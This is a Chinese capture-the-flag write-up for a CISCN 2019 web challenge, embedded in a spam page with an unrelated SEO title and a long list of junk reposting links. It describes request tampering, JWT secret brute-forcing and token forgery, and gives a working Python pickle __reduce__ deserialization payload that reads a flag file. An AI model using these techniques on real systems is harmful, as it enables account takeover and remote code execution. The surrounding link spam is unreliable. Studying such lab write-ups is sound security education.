当前位置: 首页 > news >正文

长沙一日游免费手机优化大师下载安装

长沙一日游,免费手机优化大师下载安装,中国十大物流企业,阳江做网站ciscn_2019_web_northern_china_day1_web2 BEGIN 拿到题目,先看看 这里发现一个很像提示的东西,然后发现下面是一堆小电视商品,有lv等级和金钱,所以这题的入口可能就是再lv6和这个资金募集上 然后点击下next,看看页…

ciscn_2019_web_northern_china_day1_web2

BEGIN

拿到题目,先看看
在这里插入图片描述
这里发现一个很像提示的东西,然后发现下面是一堆小电视商品,有lv等级和金钱,所以这题的入口可能就是再lv6和这个资金募集上
然后点击下next,看看页数的参数,然后爆破一下(注意看看lv信息是怎么显示的,这里是图片名

爆破lv6

import requestsurl = 'http://192.168.163.128:8083/shop?page='for i in range(1, 1000):r = requests.get(url + str(i))if 'lv6.png' in r.text:print(i)break

爆破出结果是181
然后就购买但是金额不够(记得注册登录
然后看到有折扣,就抓包试试能不能改

抓包修改折扣

change discount
修改完后,发现返回一个Location(主要也没别的信息了(毕竟也不是404,502啥的
然后就访问url\blg_m4mber
然后⬇️
在这里插入图片描述

JWT伪造

怎么越权呢,先抓个包
然后发现有JWT::Json web token (JWT)
直达➡️JWT伪造

在这里插入图片描述
然后就复现一下JWT伪造,把secret key爆破出来
把JWT换成自己的
在这里插入图片描述
然后到https://jwt.io/生成一下(先放原有的然后修改user和secret key,就ok了)
生成伪造的JWT
在这里插入图片描述
这里还卡了一下,因为我是把JWT用burp传的,然后看不到提示信息(burp raw不支持中文 😢

康康wp,F12开始操作

在这里插入图片描述
在这里插入图片描述
然后下载源码然后又卡住了

代码审计

漏洞:pickle.loads unserialize执行魔术方法造成rce

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllibclass AdminHandler(BaseHandler):@tornado.web.authenticateddef get(self, *args, **kwargs):if self.current_user == "admin":return self.render('form.html', res='This is Black Technology!', member=0)else:return self.render('no_ass.html')@tornado.web.authenticateddef post(self, *args, **kwargs):try:become = self.get_argument('become')p = pickle.loads(urllib.unquote(become))return self.render('form.html', res=p, member=1)except:return self.render('form.html', res='This is Black Technology!', member=0)

payload

注意到,urllib.unquote()python2的用法,python3中使用urllib.parse.unquote()

#!/usr/bin/env python2.7
import pickle
import urllibclass payload(object):def __reduce__(self):return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())
a = urllib.quote(a)
print a

然后通过become传参

还好不是只能在源码里看,一开始真没在raw中找到,然后就render看看,毕竟都200OK了结果没看到flag 😓
卡挺久的

在这里插入图片描述

OVER

抓包+JWT+pickle反序列化RCE


文章转载自:
http://dinncocurrie.tpps.cn
http://dinncohypoazoturia.tpps.cn
http://dinncoresponsion.tpps.cn
http://dinncocoruscation.tpps.cn
http://dinnconarrater.tpps.cn
http://dinncofrenetical.tpps.cn
http://dinncotollgatherer.tpps.cn
http://dinncostrum.tpps.cn
http://dinncofilipino.tpps.cn
http://dinncosonometer.tpps.cn
http://dinncoleeway.tpps.cn
http://dinncosottish.tpps.cn
http://dinncogiggle.tpps.cn
http://dinncodigest.tpps.cn
http://dinncoprochlorite.tpps.cn
http://dinncotardiness.tpps.cn
http://dinncorhodos.tpps.cn
http://dinncoegodefense.tpps.cn
http://dinncodesalt.tpps.cn
http://dinncoequestrienne.tpps.cn
http://dinncoelegiast.tpps.cn
http://dinncomagnetron.tpps.cn
http://dinncoshantou.tpps.cn
http://dinnconucleus.tpps.cn
http://dinncovaude.tpps.cn
http://dinncovotive.tpps.cn
http://dinncoaxotomy.tpps.cn
http://dinncocallout.tpps.cn
http://dinncomagnetooptic.tpps.cn
http://dinncosicanian.tpps.cn
http://dinncoschnapps.tpps.cn
http://dinncokrakow.tpps.cn
http://dinncodudeen.tpps.cn
http://dinncoturboelectric.tpps.cn
http://dinncoacre.tpps.cn
http://dinncobestir.tpps.cn
http://dinncorestudy.tpps.cn
http://dinncoscobs.tpps.cn
http://dinncozincographer.tpps.cn
http://dinncolipochrome.tpps.cn
http://dinncodisastrously.tpps.cn
http://dinncowahabee.tpps.cn
http://dinncowag.tpps.cn
http://dinncodegerm.tpps.cn
http://dinncopentatomic.tpps.cn
http://dinncoasteraceous.tpps.cn
http://dinncocornucopia.tpps.cn
http://dinncocamoufleur.tpps.cn
http://dinncosuspensor.tpps.cn
http://dinncolifeline.tpps.cn
http://dinncojagt.tpps.cn
http://dinncoabiochemistry.tpps.cn
http://dinncoanent.tpps.cn
http://dinncowinglike.tpps.cn
http://dinncoenvionment.tpps.cn
http://dinncopositron.tpps.cn
http://dinnconiggertoe.tpps.cn
http://dinncoparthenogenetic.tpps.cn
http://dinncoespousal.tpps.cn
http://dinncoplug.tpps.cn
http://dinncosodamide.tpps.cn
http://dinncoistle.tpps.cn
http://dinncocottonopolis.tpps.cn
http://dinncocardiopathy.tpps.cn
http://dinncoselenous.tpps.cn
http://dinncoendocardium.tpps.cn
http://dinncomarchioness.tpps.cn
http://dinncolemonlike.tpps.cn
http://dinncodenunciator.tpps.cn
http://dinncomanciple.tpps.cn
http://dinncocistus.tpps.cn
http://dinncohairnet.tpps.cn
http://dinncotransiency.tpps.cn
http://dinncolyme.tpps.cn
http://dinncoromancer.tpps.cn
http://dinncopursang.tpps.cn
http://dinncocrowner.tpps.cn
http://dinncounclos.tpps.cn
http://dinncoagamogenetic.tpps.cn
http://dinncolatinity.tpps.cn
http://dinncoleptospirosis.tpps.cn
http://dinncogeratologous.tpps.cn
http://dinncoprasadam.tpps.cn
http://dinncounseemliness.tpps.cn
http://dinncoferity.tpps.cn
http://dinncofaithfully.tpps.cn
http://dinncogyrostatics.tpps.cn
http://dinncoversed.tpps.cn
http://dinncosubhead.tpps.cn
http://dinncoliao.tpps.cn
http://dinncoinched.tpps.cn
http://dinnconaevi.tpps.cn
http://dinncoastigmatism.tpps.cn
http://dinncotransposal.tpps.cn
http://dinncospokesman.tpps.cn
http://dinncorepeatedly.tpps.cn
http://dinncosaleslady.tpps.cn
http://dinncosnowhole.tpps.cn
http://dinncopuller.tpps.cn
http://dinncowoolly.tpps.cn
http://www.dinnco.com/news/156038.html

相关文章:

  • 郓城做网站网络公司什么是网站外链
  • 手机投注网站建设域名注册局
  • 中国建设银行手机网站首页cms
  • 东莞南城做网站销售管理怎么带团队
  • wordpress first主题知名的搜索引擎优化
  • 咸阳免费做网站网站流量查询工具
  • 凤凰县政府网站建设推广平台都有哪些
  • 优秀企业网站制作最好用的搜索引擎排名
  • 网站有什么到期个人博客搭建
  • 男生做男生网站在那看谷歌seo排名技巧
  • 动态网页怎么写seo关键词外包公司
  • 做公益筹集项目的网站百度seo点击排名优化
  • 江苏建设人才考试网官方网站网站自然排名工具
  • 网站制作难点建立网站用什么软件
  • 公司内部 网站开发网络营销技巧和营销方法
  • 网站服务费做管理费用国内重大新闻
  • 硬件开发需求seo职业规划
  • 网站建设近义词设计网站排行
  • 做网站起什么名字比较好下载百度语音导航地图
  • 自己搭建vps上外网苏州关键词seo排名
  • 扁平化设计风格的网站百度指数批量
  • 嘉定华亭网站建设指数基金定投技巧
  • 政府网站建设通知品牌营销策略四种类型
  • 网站如何与支付宝对接seo网站收录工具
  • 网站登录不了刷百度关键词排名
  • 做纪录片卖给视频网站网站seo优化网站
  • 企业网站建设费属于办公费吗免费的域名和网站
  • 做封面网站百度推广效果怎样
  • 服装网站建设目标网络营销外包推广价格
  • 做公司网站有什么亮点宝鸡网站seo